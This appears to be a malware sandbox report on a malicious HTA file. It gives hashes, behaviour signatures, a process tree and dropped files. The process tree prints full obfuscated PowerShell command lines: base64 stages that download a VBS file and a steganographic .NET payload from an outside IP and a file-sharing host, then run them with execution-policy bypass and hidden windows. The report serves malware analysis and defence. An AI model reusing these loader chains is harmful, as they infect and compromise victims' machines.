Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14-11-2024 02:04

General

  • Target
    0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta
  • Size
    207KB
  • MD5
    1cc49542b6408627091678140cb916c9
  • SHA1
    66e198338df798a6ef051a71feee749bae890a6d
  • SHA256
    0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7
  • SHA512
    1a0a432d112a5f2091c25a629c4a345bd0977207d4451b1581d0b1bdab2375b38207d0e760a56d595fcc975b9d708b897347a7d5a408f1a13c53965d23e9314b
  • SSDEEP
    96:43F97yT4lwyT4lYv7eZ9emfyFX4T4lTfQ:43F1yT4myT4Kv7eOkyd4T4dQ

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
      "C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2312
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8685.tmp" "c:\Users\Admin\AppData\Local\Temp\5v1l4tli\CSC5037BC2A632742CDA51A1F19327138D.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3180
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3136
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3260

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWeRSheLl.EXE.log
    Filesize: 2KB
    MD5: 3d086a433708053f9bf9523e1d87a4e8
    SHA1: b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
    SHA256: 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
    SHA512: 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 18KB
    MD5: 7ade4eac19edec129ed9db85cb5532a7
    SHA1: 0391739389af7215368f628538e216b5dceda076
    SHA256: 82ece7dda590f669ba419ebb5b424e72fd7cada67158c5afe779007405425bf6
    SHA512: ce25a5f48e2b58c6e806243252cccd6122498ba9194d502af273aec0035c4f772a41ce97849b3dcbce0fb213dfafdade12f4535ec8ce0de4c1b5beb68231d83c

  • C:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.dll
    Filesize: 3KB
    MD5: 9fe79efa6323525225d363ace15df72f
    SHA1: e5e5ef02040b9f7c27e4ffcbd098112a3e8c6473
    SHA256: 05f17359cc26de9edbd500ac70a7b6d4740771050b44b6335e2f8fc3ba41e9d5
    SHA512: 3cf16f9bb2d642882b960149361169d48f54f37b0b6231f9142e5fb373a3238bdc44b01db21cc112858e43e2e3a8f4383beab50e5765f2d4f2d139fe9bf783b4

  • C:\Users\Admin\AppData\Local\Temp\RES8685.tmp
    Filesize: 1KB
    MD5: d8aa2f25f919a326f53874af42a320c6
    SHA1: 9b820a7d273dcc84f2e2acf0012d0dde5d3339b0
    SHA256: e2dbd0364a0a5849588594d8e6882d2688ba158a0facc5e3b7d375a022856741
    SHA512: d210ca2a0334023e9c99b77b619ee9862ffab94f5cc77b509a99cd4b008709ddae7c23565e8675baba6fdb901eff14a16d0669be307f410594b39564ce25e8ad

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wpistrh.pi2.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS
    Filesize: 138KB
    MD5: 4f46597a54e903c400cac4db5a222ecb
    SHA1: 0a2f30da05a532bfbddaba3af235011d60db8fc8
    SHA256: ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
    SHA512: ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

  • \??\c:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.0.cs
    Filesize: 483B
    MD5: 0b9734ed54c4f41d0c94957b007eb3d5
    SHA1: ebabbb2d826295a994ba691d921a4c7c5ed506d1
    SHA256: 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
    SHA512: d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

  • \??\c:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.cmdline
    Filesize: 369B
    MD5: a7e015ee5f79210a63dba811dfb28e78
    SHA1: b9d2ca819d228b8b57022245f8ae3b64ac9e6b21
    SHA256: 4f3850a9002617f568507a7f35d341c4af517db9cde1cb385a39a1aea4ebea41
    SHA512: 73c24f9ac50e0f1edd2487b89340c9e4f32e13d1f249b0e86fe2a778806e8ee649c40d09ec6c403cc97fea23f33949b22d1e4a10fbb6a099543df861814d410b

  • \??\c:\Users\Admin\AppData\Local\Temp\5v1l4tli\CSC5037BC2A632742CDA51A1F19327138D.TMP
    Filesize: 652B
    MD5: 1b25fdc46469068a40fa6184405e4346
    SHA1: 19e31ce6770008877096fbbe5b6e25fe68065947
    SHA256: 447dd2d370612b55bcf7ce2de965c1e5ea91527b14b14c01e256dbee4d18ea3f
    SHA512: 4f00b01776650c7d24cc0a1b5152b00b36c5832bc82abf74e4fb34b27a9d77a72b8adf3243dd6cf2030c3231571b266f7123d786785b1fd3f023819f66ea6edf

  • memory/2140-13-0x00000000061B0000-0x0000000006504000-memory.dmp
    Filesize: 3.3MB
  • memory/2140-73-0x0000000007B80000-0x0000000007BA2000-memory.dmp
    Filesize: 136KB
  • memory/2140-19-0x00000000067E0000-0x000000000682C000-memory.dmp
    Filesize: 304KB
  • memory/2140-81-0x0000000071340000-0x0000000071AF0000-memory.dmp
    Filesize: 7.7MB
  • memory/2140-1-0x0000000005200000-0x0000000005236000-memory.dmp
    Filesize: 216KB
  • memory/2140-2-0x0000000005900000-0x0000000005F28000-memory.dmp
    Filesize: 6.2MB
  • memory/2140-3-0x0000000071340000-0x0000000071AF0000-memory.dmp
    Filesize: 7.7MB
  • memory/2140-74-0x0000000008C90000-0x0000000009234000-memory.dmp
    Filesize: 5.6MB
  • memory/2140-18-0x00000000067C0000-0x00000000067DE000-memory.dmp
    Filesize: 120KB
  • memory/2140-7-0x0000000006140000-0x00000000061A6000-memory.dmp
    Filesize: 408KB
  • memory/2140-72-0x0000000071340000-0x0000000071AF0000-memory.dmp
    Filesize: 7.7MB
  • memory/2140-71-0x000000007134E000-0x000000007134F000-memory.dmp
    Filesize: 4KB
  • memory/2140-65-0x0000000006D60000-0x0000000006D68000-memory.dmp
    Filesize: 32KB
  • memory/2140-4-0x0000000071340000-0x0000000071AF0000-memory.dmp
    Filesize: 7.7MB
  • memory/2140-5-0x0000000005F30000-0x0000000005F52000-memory.dmp
    Filesize: 136KB
  • memory/2140-6-0x00000000060D0000-0x0000000006136000-memory.dmp
    Filesize: 408KB
  • memory/2140-0-0x000000007134E000-0x000000007134F000-memory.dmp
    Filesize: 4KB
  • memory/2312-43-0x0000000007330000-0x000000000734A000-memory.dmp
    Filesize: 104KB
  • memory/2312-50-0x0000000007650000-0x0000000007658000-memory.dmp
    Filesize: 32KB
  • memory/2312-49-0x0000000007670000-0x000000000768A000-memory.dmp
    Filesize: 104KB
  • memory/2312-48-0x0000000007570000-0x0000000007584000-memory.dmp
    Filesize: 80KB
  • memory/2312-47-0x0000000007560000-0x000000000756E000-memory.dmp
    Filesize: 56KB
  • memory/2312-46-0x0000000007530000-0x0000000007541000-memory.dmp
    Filesize: 68KB
  • memory/2312-45-0x00000000075B0000-0x0000000007646000-memory.dmp
    Filesize: 600KB
  • memory/2312-44-0x00000000073A0000-0x00000000073AA000-memory.dmp
    Filesize: 40KB
  • memory/2312-42-0x0000000007980000-0x0000000007FFA000-memory.dmp
    Filesize: 6.5MB
  • memory/2312-41-0x0000000007210000-0x00000000072B3000-memory.dmp
    Filesize: 652KB
  • memory/2312-40-0x00000000065C0000-0x00000000065DE000-memory.dmp
    Filesize: 120KB
  • memory/2312-30-0x000000006DC00000-0x000000006DC4C000-memory.dmp
    Filesize: 304KB
  • memory/2312-29-0x00000000071D0000-0x0000000007202000-memory.dmp
    Filesize: 200KB